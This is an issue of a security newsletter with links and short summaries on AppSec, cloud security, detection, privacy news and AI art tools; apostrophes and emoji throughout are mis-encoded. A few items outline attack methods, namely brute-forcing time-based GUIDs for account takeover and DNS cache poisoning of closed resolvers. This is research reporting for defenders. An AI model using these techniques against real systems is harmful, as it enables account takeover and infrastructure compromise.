Hey there,
I hope youâve been doing well!
Saving the World đڏ
This week, on #PeakBayArea
.
Even more than making money or being profitable, itâs key for Bay Area tech companies to have a grand vision.
Regardless of if youâre getting third world kids clean water, or more likely improving ad targeting, itâs essential to disrupt, and as Silicon Valley rightly skewered, make the world a better place.
But itâs not just tech companies that need to Be The Change. Itâs everyone.
Does your milk provide calcium and other healthy vitamins and minerals?
Weak. You gotta get on this milk that embodies environmental leadership or directly fights climate change, as you drink it!!
Sponsor
đ˘ 2022 Cloud-Native Threats
As organizations move to cloud, cyberattackers have followed. While motives havenât changed, techniques have - cryptojacking, supply chain threats and geopolitical hacktivism.
Did you know that for a cryptojacker to make $1, it costs the victim $53 in cloud bills?
Read Sysdigâs blog for more insights and analysis on:
- Notorious cloud adversary: TeamTNT
- Supply chain attacks against containers
- Geopolitical conflict influences on attacker behavior
đ In this newsletter...
- AppSec: How to plan an SMS migration, you can brute force version 1 GUIDs, write Semgrep rules to quickly verify ideas
- Web Security: Generate an API client from OpenAPI, open source API security platform, DNS attacks on closed resolvers
- Cloud Security: Clean up unused AWS access keys, compute cost calculator, AWS permission boundaries for dummies, diving deeply into IAM policy evaluation
- Blue Team: Cloned website canarytoken, on trust and transparency in detection, stopping vulnerable driver attacks
- Politics / Privacy: Kanye buys Parler, UK spy chief says China's tech manipulations threaten all
- Machine Learning: GitHub Copilot lawsuit, prompt engineering resources, public database of AI generated images, Google project to generate video from text, automatically generate AI art using your own blog content, Microsoft product to use AI for social media graphics
- Misc: Super Mario Bros movie, meme search engine, archery tag, a vision for OWASP's future
AppSec
How to plan an SMS MFA migration that affects thousands of users
Twilioâs Jordan Kohl describes how they
handled a tricky migration, including dealing with an external API and
constantly changing production database, in a way that doesnât lock out users.
In GUID We Trust
Intruderâs Daniel Thatcher describes how
you can brute force version 1 GUIDs if you know the approximate time the GUID
was generated, as well as the node ID and clock sequence of the generating
system. When GUIDs are used for password resets, this could be used for account
takeover for example.
Daniel also released a
tool to help with this attack and a
CTF challenge to practice on.
Semgrep: Writing quick rules to verify ideas
GitLabâs Dominic Couture makes the case for
using Semgrep for quickly writing disposable rules to validate an idea when
reviewing code. Specifically, finding GET routes that contain state-changing
functionality (frameworks often donât protect against this by default). Using
this approach, he found and reported a real CSRF issue in Kibana!
What Iâm lookin for here are
path: "something"
patterns inside arouter.get(...)
call so I will express that in semgrep terms. The semgrep code is very close to the sentence I just wrote!
Web Security
Kiota
A CLI tool for generating an API client to call any OpenAPI described API. The
goal is to eliminate the need to take a dependency on a different API SDK for
every API that you need to call. Kiota API clients provide a strongly typed
experience with all the features you expect from a high quality API SDK, but
without having to learn a new library for every HTTP API.
metlo-labs/metlo
An open-source API security platform, by Metlo.
- Endpoint Discovery - Scans network traffic and creates an inventory of every API endpoint.
- Sensitive Data Scanning - Each endpoint is scanned for PII data and given a risk score.
- Vulnerability Discovery - Get alerts for issues like unauthenticated endpoints returning sensitive data, no HSTS headers, PII data in URL params, Open API spec diffs, and more.
Melting the DNS Iceberg: Taking over your infrastructure Kaminsky style
SEC Consultâs Timo Longin
and Clemens Stockenreitner describe attacking closed DNS resolvers, which you
can reach using SPF, DKIM, and DMARC. Tool release:
DNS-Analysis-Server.
By analyzing closed DNS resolvers on the Internet, we found numerous ISPs and hosting providers that are vulnerable to trivial Kaminsky attacks. This allows an attacker to manipulate the DNS name resolution of thousands of systems. As a consequence, e-mail redirections, account takeovers and even the compromise of entire systems may be possible.

Cloud Security
tuladhar/cleanup-aws-access-keys
A cloud security tool to search and clean up unused AWS access keys, written in
Go, by Puru Tuladhar.
Compute Cost Calculator
By Eric Wastl: Find the lowest price of compute
resources from different AWS services given some criteria, like RAM or CPUs.
AWS Permission Boundaries for Dummies
Great overview by FireMonâs Rich Mogull.
TL;DR: Regular IAM policies let you do things, but can also stop you from doing things. Permission boundaries only stop you from doing things. You mostly use them to let someone administer some IAM stuff but not so much IAM stuff that they can escalate privileges (for themselves or someone else). They are a failsafe. If you let someone manage IAM in an account and donât want them to be able to escalate privileges, you almost always need a permission boundary!
Diving Deeply into IAM Policy Evaluation
Ermeticâs Noam Dahan provides a great overview of the AWS re:Inforce session by AWS Sr. Solutions Architect Matt Luttrell and AWS Sr. Software Engineer for IAM Access Analyzer Dan Peebles. The talk delves into some of AWS IAMâs most arcane edge cases â and why they behave as they do. The session took a deep dive into AWS IAM internal evaluation mechanisms never shared before and revealed a new model for representing the AWS permission evaluation process. So many GIFs of flow charts đ
Sponsor
đ˘ Drop that Cloud Zero for a Cloud Hero!
We at Permiso love our bold statements and definitely our 90s references (can you guess it?). Do you have an army of cloud heros building detections and responding to cloud breaches in your environment? If so, then weâre not the solution for you!
However, if you need help from experts who know how to find âevilâ in cloud, weâre your Cloud Heros! If you donât believe us, just check out our research and disclosures on our blog to get a glimpse of our unique insights and why weâre the Cloud Heros for you! Weâre also offering a free Cloud Compromise Assessment with no strings attached (except maybe talking to one of our CEOs!). If you just want to reminisce about the 90s, thatâs fair game too!
Talk to a Cloud HeroBlue Team
Cloned Website Token
By Thinkst Canary: Place this canary token
within the JavaScript of your websites and it notifies you if someone clones
your site and hosts it on another domain, which is often done in targeted
phishing attacks.
On Trust and Transparency in Detection
Interesting reflections by Anton Chuvakin
and Oliver Rochford on the history and
future of detection logic being transparent, explainability vs
understandability, accuracy, and more.

Stopping Vulnerable Driver Attacks
Ransomware actors are leveraging vulnerable drivers to tamper with endpoint security products. Elasticâs Joe Desimone describes how Elastic Security has released 65 YARA rules to detect vulnerable driver abuse.
Elastic Security in 8.4 adds another powerful tool that can be used to identify suspicious drivers. This is the âNew Termsâ rule type, which can be used to create an alert when a term (driver hash, signer, version, internal file name, etc) is observed for the first time.
This empowers security teams to quickly surface unusual drivers the first time theyâre seen in their environment. This supports a detection opportunity for even previously unknown vulnerable drivers or other driver-based adversary tradecraft.
Politics / Privacy
Ye, formerly known as Kanye West, to acquire Parler platform
Kanye was recently booted from Twitter for antisemitic comments. Also, is this real life?
Fear driving Chinaâs tech manipulation poses threat to all
China is using its financial and scientific muscle to manipulate technologies in a manner that risks global security, Britainâs top cyber spy will say on Tuesday, warning that Beijingâs actions could represent âa huge threat to us all.â
In a speech, Jeremy Fleming, director of the GCHQ spy agency, will say that the Chinese leadership was seeking to use technologies such as digital currencies and its Beidou satellite navigation network to tighten its grip over its citizens at home, while spreading its influence abroad.
Machine Learning
GitHub Copilot investigation
Description of a lawsuit being filed against GitHub Copilot, claiming it violates its legal duties to open-source authors and end users.
Maybe you donât mind if GitHub Copilot used your open-source code without asking. But how will you feel if Copilot erases your open-source community?
sw-yx/prompt-eng
Shawn Wang shares a ton of resources for prompt
engineering on (mostly) Stable Diffusion, DALL-E 2, and Midjourney.
Arthub.ai
Explore AI generated designs, images, art and prompts by top community artists
and designers. Some seriously cool photos.
Imagen Video
New release from the Google Research, Brain Team, that generates video based on
a text description.
Generate AI Art Using Your Own Writing
Super cool post by Daniel Miessler that
describes how to take the text of a blog post, auto-summarize it into a prompt
(for DALL-E 2, Stable Diffusion, Midjourney), and then use the prompt to
generate art for the post. Such a neat read.
Microsoft Designer - Create stunning designs in a flash
New product by Microsoft aimed at making it easier to create graphics for social
media and other everyday uses, powered by DALL-E 2. You can generate a totally
custom image, or start from a template or stock image, add your own content
(photo, logo, messaging), and more.
Also, everybody needs to relax sometimes.
Misc
The Super Mario Bros. Movie - Official Teaser Trailer
Itâs-a me, franchise money-oh!
FindThatMeme
Search millions of memes from across the web in seconds. You can search by text
in the meme, or by providing a meme you want to find similar memes to.
Archery Tag
Last week I called out DodgeBow, and lamented that itâs only in Montreal. Soon
after, Rami McCarthy let me know about
Archery Tag, which appears to be a similar idea, with many more locations!
My Manifesto for the OWASP Board Election
Mark Curphey paints an interesting
picture for where OWASP could head. Iâm not endorsing (or not endorsing) these
points, but in general, I like people dreaming big. Mark recommends:
- Changing the funding model - instead of running mostly on personal membership fees, raise money from large corporate sponsors and government grants, like the CNCF and OSSF.
- Creating an OWASP Investment Fund - Invest like a VC in companies built around OWASP projects.
- Clarify the mission statement, reduce beaucracy, clarify community values, and
more.
âď¸ Wrapping Up
Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them đ
Thanks for reading!
Cheers,Clint
@clintgibler